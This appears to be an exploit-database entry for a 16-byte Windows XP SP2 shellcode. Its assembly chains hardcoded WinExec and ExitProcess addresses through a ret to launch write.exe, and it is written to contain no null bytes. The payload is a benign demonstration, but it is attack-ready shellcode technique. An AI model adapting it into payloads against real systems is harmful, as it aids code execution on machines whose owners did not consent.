Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes)
Author: czy
type:
platform: windows_x86
port: 16.0
date_added: 2010-03-17
date_updated:
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
# Title: Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes
;Test on xpsp2cn,no zero in shellcode,it will run write.exe()
;---------------------------------------------
push 7C808E9DH ;write ;68 xx xx xx xx ;program string in memory
push 7C81CAA2H ;exitprocess ;68 xx xx xx xx
push 7C86114DH ;winexec ;68 xx xx xx xx
ret ;C3
;--------------------------------------------